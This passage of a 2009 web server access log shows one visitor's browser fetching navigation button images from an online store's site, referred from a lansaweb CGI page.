87.246.39.116 - - [28/Jun/2009:09:09:54 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; bg; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
87.246.39.116 - - [28/Jun/2009:09:09:54 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; bg; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
87.246.39.116 - - [28/Jun/2009:09:09:54 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; bg; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11" 87.246.39.116 - - [28/J